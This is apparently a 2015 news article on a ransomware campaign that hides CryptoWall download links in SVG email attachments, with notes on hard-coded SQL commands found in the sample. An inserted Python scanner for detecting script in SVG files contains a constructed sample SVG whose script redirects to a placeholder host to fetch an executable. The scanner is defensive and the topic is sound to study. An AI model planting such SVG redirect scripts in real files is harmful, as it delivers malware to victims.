Analysts find SQL commands hard coded in the malware

May 23, 2015 06:50 GMT

A recently discovered malicious email campaign reveals a less common malware delivery method: SVG files (image files with support for interactivity and animation) are used to hide the links to a crypto-malware download.

Researchers who caught a sample email and analyzed the behavior of the nasty SVG say that the payload appears to be CryptoWall, judging by several indicators associated with this malware family.

The ransom message displayed to the victim after data encryption completes also points to this particular threat. The demand is $700 / €635.

Malware host available in SVG's JavaScript code

The email contains the typical lure of someone claiming to send their resume. The text is brief and points the recipient to the malicious attachment. Infecting the computer requires user interaction.

The SVG (Scalable Vector Graphics) format supports embedded JavaScript, which the attackers took advantage of to include links to the location hosting the file-encrypting ransomware.
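To show what such active content looks like from the defender's side, here is an added example (not from the article or from AppRiver): a small Python scanner that parses an SVG attachment and reports script elements, event-handler attributes and external URLs. The sample SVG and the URL inside it are constructed, not indicators from the campaign.

```python
import re
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"

# Constructed sample: an SVG whose onload handler and <script> block point
# at an external host. The URL is a placeholder, not a real indicator.
SAMPLE_SVG = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="init()">
  <rect width="100" height="100" fill="#ccc"/>
  <script type="text/javascript"><![CDATA[
    function init() { window.location = "http://example.invalid/resume.exe"; }
  ]]></script>
</svg>"""

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)      # onload, onclick, ...
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)


def scan_svg(svg_text):
    """Return a dict describing the active content found in one SVG document."""
    findings = {"script_elements": 0, "event_handlers": [],
                "external_refs": [], "urls_in_script": []}
    root = ET.fromstring(svg_text)          # treat the input as untrusted: parse only, never render
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]       # drop the namespace prefix
        if tag == "script":
            findings["script_elements"] += 1
            # CDATA content is exposed as plain text by ElementTree
            findings["urls_in_script"].extend(URL_RE.findall(elem.text or ""))
        # href / xlink:href to a remote host (script src, image, anchor, ...)
        href = elem.get("{%s}href" % XLINK_NS) or elem.get("href")
        if href and href.lower().startswith(("http://", "https://")):
            findings["external_refs"].append("%s@%s" % (tag, href))
        for attr in elem.attrib:
            if EVENT_ATTR.match(attr):
                findings["event_handlers"].append("%s@%s" % (tag, attr))
    # an image file has no business carrying script or event handlers
    findings["suspicious"] = bool(findings["script_elements"] or findings["event_handlers"])
    return findings


if __name__ == "__main__":
    for key, value in scan_svg(SAMPLE_SVG).items():
        print("%-16s %s" % (key, value))
```

A mail gateway or sandbox can apply the same check to every SVG attachment and quarantine any file that reports `suspicious`.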

Researchers at AppRiver analyzed the downloaded file and discovered that it contained hard-coded SQL commands, pointing to what appears to be a school's database. The experts had halted attacks with this malware before, which targeted schools, Jonathan French said in a blog post.

SQL commands suggest attack on school database

“While it’s possible the malware had other intentions from encrypting in mind, like to wreak havoc in an SQL database, this was from a strings output so it was all plain text and the table naming conventions just seem a little too plain as well. However, someone knowing SQL table names or a school using a plain naming convention could be problematic if the malware were to attempt to attain access and do its thing,” the researcher explains.

The SQL commands identified in the malware code would certainly be damaging to a database, since they allow the attacker to insert or delete entries.

On the other hand, the commands could also be a decoy meant to make analysis more difficult, since malware authors sometimes add legitimate-looking functions to throw researchers off track.

This is the more likely scenario, because none of the commands was executed during AppRiver's analysis.